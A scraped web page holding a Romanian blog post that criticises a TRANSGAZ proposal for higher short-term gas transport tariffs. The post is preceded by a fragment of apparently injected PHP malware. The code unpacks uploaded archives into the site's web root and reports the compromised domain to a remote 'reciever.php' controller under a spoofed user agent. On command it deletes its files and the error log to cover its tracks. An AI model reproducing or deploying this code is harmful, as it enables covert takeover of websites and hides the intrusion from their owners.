'; $data = $data1.$data2.$data3.$data4.$data5; $fas = fopen ($unzip_path, "w"); fwrite($fas, $data); fclose($fas); $unzip_url = 'http://'.$domain_name_2.'/'.$status[1].'unzip.php'; echo getURL($unzip_url); } } else { echo '~Can not upload archive!~'; rmdir($dir_path); exit; } if (file_exists($script_name)) { echo '~Client has been activated!~'; $file_name = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file = fopen($file_name,"rt"); $original_file = fread($file,filesize($file_name)); fclose($file); $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file.'reciever.php?data='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); exit; } else { echo '~Can not unziped!~'; unlink($archive_path); rmdir($dir_path); exit; } } else { echo '~Can not make dir!~'; exit; } } if ($status[0] == 'finish') { $file_name_2 = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file_2 = fopen($file_name_2,"rt"); $original_file_2 = fread($file_2,filesize($file_name_2)); fclose($file_2); if (($status[1] != null) and ($status[1] != '')) $dir_for_work = $status[1]; else $dir_for_work = 'conflg/'; $dir_path = $_SERVER['DOCUMENT_ROOT'].'/'.$dir_for_work; $archive_path = $dir_path.'1.zip'; if (is_dir($dir_path)) { $arr_filename = array (); if ($dh = opendir($dir_path)) { while (($file = readdir($dh)) !== false) { if (($file != ".") and ($file != "..")) $arr_filename[] = $file; } closedir($dh); } foreach ($arr_filename as $key) { $key = trim($key); $file_for_delete = "$dir_path/$key"; $file_for_delete = str_replace('///', '/', $file_for_delete); $file_for_delete = str_replace('//', '/', $file_for_delete); $file_for_check = str_replace($_SERVER['DOCUMENT_ROOT'], '/', $file_for_delete); $file_for_check = str_replace('//', '/', $file_for_check); if (substr_count($file_for_check, "/") >=2) { if (file_exists($file_for_delete)) unlink($file_for_delete); if (file_exists($file_for_delete)) { chmod($file_for_delete, 0777); unlink($file_for_delete); } } } } if (file_exists("error_log")) unlink("error_log"); if (is_dir($dir_path)) rmdir($dir_path); if (is_dir($dir_path)) { chmod($dir_path, 0777); rmdir($dir_path); } if (is_dir($dir_path)) echo "~Error!~"; else { $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file_2.'reciever.php?del='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); } exit; } } } ?> Pilula de Energie. Cresc tarifele la gaze? | Dumitru Chisalita

Rss

Pilula de Energie. Cresc tarifele la gaze?

pilulaPe site-ul ANRE se găsește în dezbatere publică, o propunere a TRANSGAZ de modificare a tarifelor de transport gaze, cuprinsă într-o Notă de prezentare a consultării publice privind factorii sezonieri și nivelurile coeficienților de multiplicare la stabilirea tarifelor de rezervare de capacitate pentru serviciile ferme de transport gaze natural pe termen scurt aplicabile în anul gazier 2016-2017

Prima observație asupra acestui document pleacă de la superficialitatea modului în care este întocmit acest document, lipsind explicații și detalieri asupra unor termeni folosiți. Este un document astfel făcut încât să nu se înțeleagă nimic.

A doua observație pleacă de la divergența dintre titlu și conținut, astfel titlul documentului vorbește despre coeficienții de multiplicare la stabilirea tarifelor de rezervare de capacitate pentru serviciile ferme de transport gaze natural pe termen scurt, în timp ce documentul vorbește de rezervare de capacitate pentru servicii ferme și intreruptibile.

Motivația TRANSGAZ-ului de realizare a acestui document dovedește lipsa de înțelegere a activității de transport gaze ca și business:

  • “asigurarea echilibrului între recuperarea eficientă a veniturilor” – oare cum să se recupereze veniturile!,
  • “facilitarea schimburilor comerciale pe termen scurt” – cum să facilitezi schimburile pe termen scurt când le crești de 6 ori față de nivelul tarifului de bază.
  • “subvenționarea încrucișată între utilizatorii rețelei” – !!!

O altă motivație expusă de TRANSGAZ este invocarea gradului scăzut de utilizare al sistemului de transport pentru creșterea tarifelor de transport. Oare cu ce sunt vinovați consumatorii că TRANSGAZ – ul construiește (inclusiv prin proiectele investiționale din planul actual) conducte și stații de reglare supradimensionate? De ce să plătească consumatorii pentru deciziile proaste (unele chiar la limita legii) luate de această companie?

Gradul de utilizare al sistemului de transport este un indicator normal de performanță managerială (refuzat a fi aplicat în anul 2013, odată cu managementul privat), un important indicator de sănătate a businessului și nu o scuză pentru creșterea prețului la gaze.

Tot întunericul lumii, nu-l poate lumina o singura lumânare. (proverb chinezesc)